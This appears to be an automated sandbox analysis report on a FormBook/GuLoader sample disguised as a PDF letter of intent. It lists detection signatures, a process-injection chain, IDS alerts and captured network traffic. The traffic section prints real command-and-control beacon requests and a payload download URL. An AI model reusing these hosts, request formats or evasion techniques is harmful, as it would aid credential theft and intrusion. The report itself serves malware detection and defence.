Windows Analysis Report
Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe

Overview

General Information

Sample name:Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
Analysis ID:1550554
MD5:629be165860d2336755de85467756639
SHA1:af1da57d01a00bf942e127cce60fb4208bfd9795
SHA256:e9617a78c93e6d5cdc1087dfa6e9bf9d63406e05b6b01135c189242a7c33718c
Tags:exe, user-TeamDreier
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe" MD5: 629BE165860D2336755DE85467756639)
    • Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe (PID: 1220 cmdline: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe" MD5: 629BE165860D2336755DE85467756639)
      • ybjXXpYwhPHZD.exe (PID: 5548 cmdline: "C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 3804 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)
          • ybjXXpYwhPHZD.exe (PID: 2516 cmdline: "C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4996 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

            System Summary

            Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe" , ParentImage: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe, ParentProcessId: 5548, ParentProcessName: ybjXXpYwhPHZD.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 3804, ProcessName: xwizard.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-06T20:32:32.980672+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49730 | TCP
            2024-11-06T20:33:13.156494+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49792 | TCP
            2024-11-06T20:33:21.629609+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49844 | 3.33.130.190 | 80 | TCP
            2024-11-06T20:33:45.370544+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49965 | 180.178.39.235 | 80 | TCP
            2024-11-06T20:33:58.924339+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50011 | 203.161.49.193 | 80 | TCP
            2024-11-06T20:34:12.569554+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50015 | 217.160.0.132 | 80 | TCP
            2024-11-06T20:32:37.413179+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 69.27.100.185 | 443 | TCP
            2024-11-06T20:33:21.629609+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49844 | 3.33.130.190 | 80 | TCP
            2024-11-06T20:33:45.370544+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49965 | 180.178.39.235 | 80 | TCP
            2024-11-06T20:33:58.924339+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50011 | 203.161.49.193 | 80 | TCP
            2024-11-06T20:34:12.569554+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50015 | 217.160.0.132 | 80 | TCP
            2024-11-06T20:33:37.730040+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49922 | 180.178.39.235 | 80 | TCP
            2024-11-06T20:33:40.308120+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49938 | 180.178.39.235 | 80 | TCP
            2024-11-06T20:33:43.026832+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49950 | 180.178.39.235 | 80 | TCP
            2024-11-06T20:33:51.292199+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50001 | 203.161.49.193 | 80 | TCP
            2024-11-06T20:33:53.834312+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50009 | 203.161.49.193 | 80 | TCP
            2024-11-06T20:33:56.388553+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50010 | 203.161.49.193 | 80 | TCP
            2024-11-06T20:34:04.854646+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 217.160.0.132 | 80 | TCP
            2024-11-06T20:34:07.463930+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 217.160.0.132 | 80 | TCP
            2024-11-06T20:34:10.057706+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 217.160.0.132 | 80 | TCP
            2024-11-06T20:34:19.192230+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 216.40.34.41 | 80 | TCP
            2024-11-06T20:34:21.979086+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 216.40.34.41 | 80 | TCP
            2024-11-06T20:34:24.595400+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 216.40.34.41 | 80 | TCP

            AV Detection

            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, ReversingLabs: Detection: 42%
            Source: Yara match, File source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 69.27.100.185:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: Binary string: mshtml.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ybjXXpYwhPHZD.exe, 00000005.00000002.3107024135.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000002.3106981368.00000000006EE000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2254898946.0000000032DB8000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2252886370.0000000032C0C000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000006.00000003.2349818754.00000000043F2000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000006.00000003.2352861018.00000000045AD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: xwizard.pdbGCTL source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2315947683.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2316042059.0000000002D2E000.00000004.00000020.00020000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107515922.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Windows\SysWOW64\xwizard.exeCode function: 6_2_028BC840 FindFirstFileW,FindNextFileW,FindClose,6_2_028BC840
            Source: C:\Windows\SysWOW64\xwizard.exe, Code function: 4x nop then xor eax, eax, 6_2_028A9E90
            Source: C:\Windows\SysWOW64\xwizard.exe, Code function: 4x nop then mov ebx, 00000004h, 6_2_04AB04E1

            Networking

            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49844 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49844 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49965 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49938 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49965 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 216.40.34.41:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50015 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49950 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50015 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50011 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50010 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 216.40.34.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 217.160.0.132:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50001 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49922 -> 180.178.39.235:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50011 -> 203.161.49.193:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 216.40.34.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 217.160.0.132:80
            Source: Joe Sandbox View, IP Address: 203.161.49.193
            Source: Joe Sandbox View, IP Address: 69.27.100.185
            Source: Joe Sandbox View, IP Address: 3.33.130.190
            Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox View, ASN Name: NETSEC-HKNETSECHK
            Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49735 -> 69.27.100.185:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49792
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /quarantin/luiKzhysatQzs26.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.evolutioncosmetics.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.regents.healthConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.73613.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n54u/?DxvPV=zbk0AVfPEjjhe&9hCtofh=ulF5vHaDZay2Ybep6qAhk1wtxYL4m99WqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2ttg6MOKAz0GZXpV5QCkBYU0gl9adu5sQ6AV2I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.eco-tops.websiteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8u3q/?9hCtofh=cm4ubz77/lIwMrhjFRgV76IEwgYIQWLXxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJeif3yFVy05no8pqYeg1JIWdJs5qV9s4yrtw=&DxvPV=zbk0AVfPEjjhe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.astrext.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.evolutioncosmetics.com
            Source: global trafficDNS traffic detected: DNS query: www.regents.health
            Source: global trafficDNS traffic detected: DNS query: www.73613.shop
            Source: global trafficDNS traffic detected: DNS query: www.eco-tops.website
            Source: global trafficDNS traffic detected: DNS query: www.astrext.info
            Source: global trafficDNS traffic detected: DNS query: www.newhopetoday.app
            Source: unknownHTTP traffic detected: POST /tizt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.73613.shopContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 204Origin: http://www.73613.shopReferer: http://www.73613.shop/tizt/User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:38 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:41 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:43 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Wed, 06 Nov 2024 19:33:46 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 19:33:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 06 Nov 2024 19:34:04 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 06 Nov 2024 19:34:07 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data 
Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
